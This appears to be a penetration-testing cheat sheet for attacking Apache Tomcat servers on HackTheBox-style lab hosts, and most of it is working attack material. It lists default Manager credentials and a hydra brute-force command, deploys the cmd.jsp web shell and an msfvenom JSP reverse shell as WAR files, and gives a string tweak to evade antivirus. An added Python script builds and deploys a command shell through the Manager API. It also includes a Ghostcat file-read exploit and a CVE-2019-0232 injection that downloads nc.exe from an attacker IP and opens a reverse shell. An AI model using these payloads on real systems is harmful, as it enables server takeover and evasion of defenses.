Tomcat

General folder structure of a Tomcat installation

├── bin
├── conf
│   ├── catalina.policy
│   ├── catalina.properties
│   ├── context.xml
│   ├── tomcat-users.xml
│   ├── tomcat-users.xsd
│   └── web.xml
├── lib
├── logs
├── temp
├── webapps
│   ├── manager
│   │   ├── images
│   │   ├── META-INF
│   │   └── WEB-INF
│   │       └── web.xml
│   └── ROOT
│       └── WEB-INF
└── work
    └── Catalina
        └── localhost

The bin folder stores scripts and binaries needed to start and run a Tomcat server.

The conf folder stores various configuration files used by Tomcat.

The tomcat-users.xml file stores user credentials (by default in clear text) and their assigned roles, including the manager-gui and manager-script roles that gate the Manager application.

The lib folder holds the various JAR files needed for the correct functioning of Tomcat. The logs folder stores Tomcat's log files (catalina.*.log, localhost_access_log.*); the temp folder holds temporary files written at runtime.

The webapps folder is the default webroot of Tomcat and hosts all the applications.

The work folder acts as a cache and is used to store data during runtime.

Each folder inside webapps is expected to have the following structure.

webapps/customapp
├── images
├── index.jsp
├── META-INF
│   └── context.xml
├── status.xsd
└── WEB-INF
    ├── jsp
    │   └── admin.jsp
    ├── web.xml
    ├── lib
    │   └── jdbc_drivers.jar
    └── classes
        └── AdminServlet.class


The most important file among these is WEB-INF/web.xml, which stores the routes used by the application and the classes handling them. Any vulnerability that exposes or lets an attacker modify these files can lead to total compromise of the website.

Jakarta Server Pages (JSP), formerly known as JavaServer Pages, are server-side templates that Tomcat compiles into servlets; they can be compared to PHP files on an Apache server.

Discovery/Footprinting

The web.xml deployment descriptor holds a lot of sensitive information (servlet-to-class mappings, init parameters that sometimes carry credentials, security constraints) and is the first file to read when a Local File Inclusion (LFI) vulnerability gives access to the webroot.

Tomcat Version

Requesting a page that does not exist (for example /invalid) returns Tomcat's default error page, whose report line (Apache Tomcat/9.0.30) discloses the version. The documentation index leaks it as well:

#Get tomcat version
Intrusionz3r0@htb[/htb]$ curl -s http://app-dev.inlanefreight.local:8080/docs/ | grep Tomcat

Default Credentials

The Manager application (/manager/html) is particularly sensitive: it allows uploading and deploying WAR files, which leads directly to code execution. It is protected by HTTP Basic authentication and only accounts holding the manager-gui role (granted in conf/tomcat-users.xml) can log in. Common default credentials are:

  • admin:admin

  • tomcat:tomcat

  • admin:

  • admin:s3cr3t

  • tomcat:s3cr3t

  • admin:tomcat

Wordlist:

  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

#Brute force attack (-L takes the user list, -P the password list; the *_userpass.txt file is a user:pass list and would need -C instead)
Intrusionz3r0@htb[/htb]$ hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f web01.inlanefreight.local http-get /manager/html

Bruteforce Script

https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce

Tomcat Manager - WAR File Upload

Intrusionz3r0@htb[/htb]$ wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Intrusionz3r0@htb[/htb]$ zip -r backup.war cmd.jsp
#Deploy backup.war through the Manager UI (/manager/html, "WAR file to deploy"); the context path is the WAR name, then call the shell
Intrusionz3r0@htb[/htb]$ curl -s 'http://web01.inlanefreight.local:8180/backup/cmd.jsp?cmd=ls'

Alternatively, generate the WAR with msfvenom (JSP reverse shell):

Intrusionz3r0@htb[/htb]$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war > backup.war

The cmd.jsp web shell as downloaded is flagged by only 2/58 anti-virus vendors, and a trivial string change such as replacing:

FileOutputStream(f);stream.write(m);o="Uploaded:

with:

FileOutputStream(f);stream.write(m);o="uPlOaDeD:

results in 0/58 security vendors flagging the cmd.jsp file as malicious at the time of writing.
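The same build-and-deploy flow in Python, as an added example that is not part of the original page and not tennc's or Metasploit's code. It packs a minimal JSP shell (constructed here) into a WAR with zipfile and deploys it through the Manager text API (PUT /manager/text/deploy), which needs the manager-script role rather than manager-gui. The host comes from the page; port 8080, the context path /backup and the credentials tomcat:s3cr3t are assumptions.

```python
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Minimal JSP command shell, constructed for this example (the page pulls tennc's cmd.jsp instead).
CMD_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>"""


def build_war(jsp_name, jsp_source):
    """A WAR is just a zip; Tomcat deploys one without WEB-INF/web.xml and compiles the JSP on first request."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war):
    """List the entries of a WAR (sanity check before upload)."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.namelist()


def basic_auth_header(user, password):
    """Value of the Authorization header the Manager expects (HTTP Basic)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return "Basic " + token


def manager_deploy_url(base, context_path):
    """Manager text API endpoint; requires the manager-script role (the /manager/html UI needs manager-gui)."""
    query = urllib.parse.urlencode({"path": context_path, "update": "true"})
    return f"{base.rstrip('/')}/manager/text/deploy?{query}"


def shell_url(base, context_path, jsp_name, cmd):
    """URL that runs cmd through the deployed JSP shell."""
    return f"{base.rstrip('/')}{context_path}/{jsp_name}?" + urllib.parse.urlencode({"cmd": cmd})


def deploy(base, user, password, context_path, war, timeout=15):
    """HTTP PUT the WAR body to the text API; Tomcat answers 'OK - Deployed application at context path [...]'."""
    req = urllib.request.Request(manager_deploy_url(base, context_path), data=war, method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Assumed target and credentials (host from the page; port, context path and creds are assumptions).
    base, user, password = "http://web01.inlanefreight.local:8080", "tomcat", "s3cr3t"
    war = build_war("cmd.jsp", CMD_JSP)
    with open("backup.war", "wb") as f:  # same artifact the page builds with zip
        f.write(war)
    print(deploy(base, user, password, "/backup", war))
    print(shell_url(base, "/backup", "cmd.jsp", "whoami"))
```

The equivalent one-liner with curl is `curl -u tomcat:s3cr3t -T backup.war 'http://web01.inlanefreight.local:8080/manager/text/deploy?path=/backup&update=true'`; undeploy with `/manager/text/undeploy?path=/backup` when done so the shell does not outlive the engagement.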

CVE-2020-1938 : Ghostcat

All Tomcat versions before 9.0.31, 8.5.51, and 7.0.100 were found vulnerable. The bug lives in the AJP connector (port 8009, configured in conf/server.xml): a crafted AJP request sets the javax.servlet.include.* request attributes and makes the DefaultServlet return any file inside the web application (WEB-INF/web.xml, source, configuration). This is a read primitive limited to the webroot, not arbitrary filesystem access; if the application also accepts file uploads, the same attributes can make Tomcat evaluate the uploaded file as a JSP and the bug becomes RCE. The AJP port must be reachable from the attacker; the fixed versions ship the connector disabled and require a shared secret.

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

Intrusionz3r0@htb[/htb]$ python2.7 tomcat-ajp.lfi.py app-dev.inlanefreight.local -p 8009 -f WEB-INF/web.xml 

Apache Tomcat: Important: Remote Code Execution on Windows (CVE-2019-0232)

Affected versions

  • 9.0.0.M1 to 9.0.17

  • 8.5.0 to 8.5.39

  • 7.0.0 to 7.0.93
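A small fingerprinting helper, added here as an example (not code from the page), that ties the Tomcat Version section to the two affected-version lists above: it pulls the version out of a /docs/ index or default error page and maps it onto the Ghostcat fix versions and the CVE-2019-0232 ranges given on this page. The two HTML samples are constructed to mirror the shape of the real title and report lines; the regex and branch tables are assumptions derived from those lines.

```python
import re
from typing import Optional

# Constructed sample of the /docs/ index page (shape of the real <title> on a default install).
SAMPLE_DOCS_HTML = """<!DOCTYPE html>
<html lang="en"><head>
<title>Apache Tomcat 9 (9.0.30) - Documentation Index</title>
</head><body><h1>Apache Tomcat 9</h1></body></html>"""

# Constructed sample of a default Tomcat 404 page; the <h3> report line leaks the version too.
SAMPLE_404_HTML = """<html><body><h1>HTTP Status 404 - Not Found</h1>
<hr class="line" /><h3>Apache Tomcat/8.5.39</h3></body></html>"""

# Matches "Apache Tomcat 9 (9.0.30)", "Apache Tomcat/8.5.39" and milestones like "Apache Tomcat 9.0.0.M1".
VERSION_RE = re.compile(r"Apache Tomcat.*?(\d+\.\d+\.\d+(?:\.M\d+)?)")

# Ghostcat (CVE-2020-1938): everything below the fix version on each branch is vulnerable.
GHOSTCAT_FIXED = {(9, 0): "9.0.31", (8, 5): "8.5.51", (7, 0): "7.0.100"}
# CVE-2019-0232: inclusive affected ranges per branch (Windows + CGI servlet required).
CVE_2019_0232_RANGES = {
    (9, 0): ("9.0.0.M1", "9.0.17"),
    (8, 5): ("8.5.0", "8.5.39"),
    (7, 0): ("7.0.0", "7.0.93"),
}


def extract_version(html: str) -> Optional[str]:
    m = VERSION_RE.search(html)
    return m.group(1) if m else None


def parse_version(v: str):
    """Sortable key; milestones (9.0.0.M1) sort before the release they precede (9.0.0)."""
    parts = v.split(".")
    major, minor, patch = (int(p) for p in parts[:3])
    if len(parts) > 3 and parts[3].upper().startswith("M"):
        return (major, minor, patch, 0, int(parts[3][1:]))
    return (major, minor, patch, 1, 0)


def ghostcat_vulnerable(v: str) -> Optional[bool]:
    key = parse_version(v)
    fixed = GHOSTCAT_FIXED.get(key[:2])
    if fixed is None:
        return None  # branch not covered by the ranges on this page (e.g. 10.x)
    return key < parse_version(fixed)


def cve_2019_0232_vulnerable(v: str) -> Optional[bool]:
    key = parse_version(v)
    rng = CVE_2019_0232_RANGES.get(key[:2])
    if rng is None:
        return None
    lo, hi = (parse_version(x) for x in rng)
    return lo <= key <= hi


def assess(html: str) -> dict:
    """Fingerprint a response body and map the version onto the two CVEs discussed here."""
    v = extract_version(html)
    if v is None:
        return {"version": None, "ghostcat": None, "cve_2019_0232": None}
    return {"version": v, "ghostcat": ghostcat_vulnerable(v), "cve_2019_0232": cve_2019_0232_vulnerable(v)}


if __name__ == "__main__":
    # Usage: curl -s http://app-dev.inlanefreight.local:8080/docs/ | python3 tomcat_version.py
    import sys
    print(assess(sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DOCS_HTML))
```

A version match is a lead, not proof: the Ghostcat connector can be firewalled or given a secret, CVE-2019-0232 still needs the CGI servlet enabled on Windows, and administrators can edit ServerInfo.properties to change the reported banner.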


The CGI servlet is disabled by default (commented out in conf/web.xml) and the fix turned enableCmdLineArguments off by default in every branch; the bug needs both enabled on Windows. Everything after the ? is split on + and handed to the .bat script as command-line arguments, and a leading & makes cmd.exe run the injected command right after the script. Fuzz for .bat scripts under /cgi/, fetch a binary with certutil, then run it:

Intrusionz3r0@htb[/htb]$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.129.47.188:8080/cgi/FUZZ.bat -t 300 -ic
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&c%3a\Windows\System32\certutil.exe+-urlcache+-split+-f+http%3a//10.10.14.33/nc.exe'
Intrusionz3r0@htb[/htb]$ curl 'http://10.129.132.157:8080/cgi/cmd.bat?&nc.exe+-e+cmd.exe+10.10.14.33+1234'
